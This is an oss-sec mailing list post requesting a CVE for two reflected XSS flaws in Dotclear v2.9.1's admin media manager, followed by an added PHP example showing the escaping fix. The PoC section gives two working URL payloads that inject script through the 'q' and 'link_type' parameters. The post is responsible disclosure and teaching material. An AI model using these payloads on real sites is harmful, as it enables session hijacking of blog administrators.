oss-sec mailing list archives
CVE request: XSS vulns in Dotclear v2.9.1
From: 陈瑞琦 <chenruiqi () 360 cn>
Date: Tue, 2 Aug 2016 06:13:03 +0000
I found some XSS vulns in Dotclear v2.9.1

Title: XSS vulns in Dotclear v2.9.1
Author: Chen Ruiqi, Chenruiqi () 360 cn
Date: 2016-08-01
Download Site: https://dotclear.org/download
Vendor: dotclear.org
Vendor Notified: 2016-08-01
Vendor Contact: security () dotclear net
--------------------------------------------------------------------------------------------------------
Description:
Dotclear is an open source blog publishing application distributed under the GNU GPLv2. Developed originally by Olivier Meunier from 2002, Dotclear has now attracted a solid team of developers.[2] It is relatively popular in French speaking countries, where it is used by several major blogging platforms (Gandi Blogs,[3] Marine nationale,[4] etc.).(Wiki)
-----------------------------------------------------------------------------------------------------------
Vulnerability:
There are two reflected XSS vulns in Dotclear v2.9.1 media manager
/admin/media.php
line 34
$link_type = !empty($_REQUEST['link_type']) ? $_REQUEST['link_type'] : null;
line 62
$q = isset($_REQUEST['q']) ? $_REQUEST['q'] : null;
Lack of filtering before putting the user input into the page.
--------------------------------------------------------------------------------------------------------
PoC Code:
http://*.*.*.*/dotclear/admin/media.php?q=77777%3C%2Fspan%3E%3Cscript%3Ealert(1)%3C/script%3E&popup=0&select=0&plugin_id=&post_id=&link_type=
http://*.*.*.*/dotclear/admin/media.php?q=77777&popup=0&select=0&plugin_id=&post_id=&link_type=8888%22%3E%3Cscript%3Ealert(1)%3C/script%3E
----------------------------------------------------------------------------------------------------------
Fix Code:
https://hg.dotclear.org/dotclear/rev/40d0207e520d

Could you assign a CVE ID for those?

Thank you
Chen Ruiqi
Codesafe Team
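Added example, not part of the original post and not Dotclear's code: the two parameters from the report rendered without and with output escaping, using PHP's built-in htmlspecialchars(). The surrounding markup and the helper names (render_unescaped, render_escaped, esc, read_params) are assumptions, since the post quotes only the two assignments; the request values are the URL-decoded parameters from the report's PoC URLs.

```php
<?php
// Added illustration. The markup is assumed: the report quotes only the two
// assignments from /admin/media.php, not the code that prints the values.

// Same selection logic as the quoted lines 34 and 62, with the request
// array passed in so the script runs from the CLI.
function read_params(array $request): array
{
    $link_type = !empty($request['link_type']) ? $request['link_type'] : null;
    $q = isset($request['q']) ? $request['q'] : null;
    return [$q, $link_type];
}

// Unescaped output: request values are concatenated straight into HTML,
// once in an element body and once in a double-quoted attribute.
function render_unescaped(?string $q, ?string $link_type): string
{
    return '<p>Search: <span>' . $q . '</span></p>' . "\n"
         . '<input type="hidden" name="link_type" value="' . $link_type . '">';
}

// ENT_QUOTES encodes <, >, &, " and ', which covers both output contexts.
function esc(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_escaped(?string $q, ?string $link_type): string
{
    return '<p>Search: <span>' . esc($q) . '</span></p>' . "\n"
         . '<input type="hidden" name="link_type" value="' . esc($link_type) . '">';
}

// Constructed request: URL-decoded values from the two PoC URLs in the report.
$request = [
    'q'         => '77777</span><script>alert(1)</script>',
    'link_type' => '8888"><script>alert(1)</script>',
];
[$q, $link_type] = read_params($request);

$before = render_unescaped($q, $link_type);
$after  = render_escaped($q, $link_type);

// Regression check: no request-supplied tag may survive in the escaped page.
echo 'unescaped contains <script>: ', var_export(strpos($before, '<script>') !== false, true), "\n";
echo 'escaped contains <script>:   ', var_export(strpos($after, '<script>') !== false, true), "\n";
echo $after, "\n";
```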
Current thread:
- CVE request: XSS vulns in Dotclear v2.9.1 陈瑞琦 (Aug 01)
- Re: CVE request: XSS vulns in Dotclear v2.9.1 cve-assign (Aug 02)